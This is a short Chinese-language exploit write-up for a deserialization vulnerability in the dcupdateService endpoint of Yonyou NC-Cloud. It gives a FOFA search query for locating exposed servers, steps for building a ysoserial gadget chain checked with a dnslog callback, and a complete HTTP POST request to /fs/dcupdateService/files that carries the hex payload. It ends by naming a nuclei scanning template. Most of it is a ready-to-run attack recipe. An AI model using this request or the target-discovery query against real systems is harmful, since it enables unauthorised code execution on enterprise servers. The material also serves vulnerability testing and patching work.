用友NC-Cloud dcupdateService存在反序列化漏洞
一、漏洞简介
用友NC Cloud是用友推出的大型企业数字化平台。用友NC-Cloud dcupdateService存在反序列化漏洞
二、影响版本
- 用友NC-Cloud
三、资产测绘
- fofa
app="用友-NC-Cloud"
- 登录页面
四、漏洞复现
- 用yakit生成dnslog域名
- 使用yso生成利用链
- 将上一步生成的hex数据替换payload字段,探测是否存在漏洞
POST /fs/dcupdateService/files HTTP/1.1
Host: {hostname}
Cookie: JSESSIONID=976CCA93B65FC45D67236311CCF581AB; JSESSIONID=84A233F63DC3637A8958D22F7FD8B305
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
{{hexd(payload)}}
nuclei脚本
用友-nc-cloud-files-反序列化.yaml